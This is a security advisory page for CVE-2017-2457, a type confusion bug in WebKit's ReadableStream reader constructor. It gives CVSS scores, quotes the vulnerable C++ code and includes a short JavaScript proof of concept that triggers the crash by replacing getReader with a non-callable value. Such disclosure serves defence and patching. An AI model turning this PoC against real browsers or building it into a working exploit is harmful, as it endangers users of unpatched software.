Apple WebKit 10.0.2 'constructJSReadableStreamDefaultReader' Type Confusion

2017.04.05
Credit: Google Security Research
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2017-2457
CWE: N/A


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

<!-- EncodedJSValue JSC_HOST_CALL constructJSReadableStreamDefaultReader(ExecState& exec) { VM& vm = exec.vm(); auto scope = DECLARE_THROW_SCOPE(vm); JSReadableStream* stream = jsDynamicDowncast<JSReadableStream*>(exec.argument(0)); if (!stream) return throwArgumentTypeError(exec, scope, 0, "stream", "ReadableStreamReader", nullptr, "ReadableStream"); JSValue jsFunction = stream->get(&exec, Identifier::fromString(&exec, "getReader")); <<--- 1 CallData callData; CallType callType = getCallData(jsFunction, callData); MarkedArgumentBuffer noArguments; return JSValue::encode(call(&exec, jsFunction, callType, callData, stream, noArguments)); } It doesn't check whether |getReader| is callable or not. PoC: --> let rs = new ReadableStream(); let cons = rs.getReader().constructor; rs.getReader = 0x12345; new cons(rs); <!-- Tested on Webkit Nightly 10.0.2(12602.3.12.0.1, r210800) -->

References:

https://bugs.chromium.org/p/project-zero/issues/detail?id=1085


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top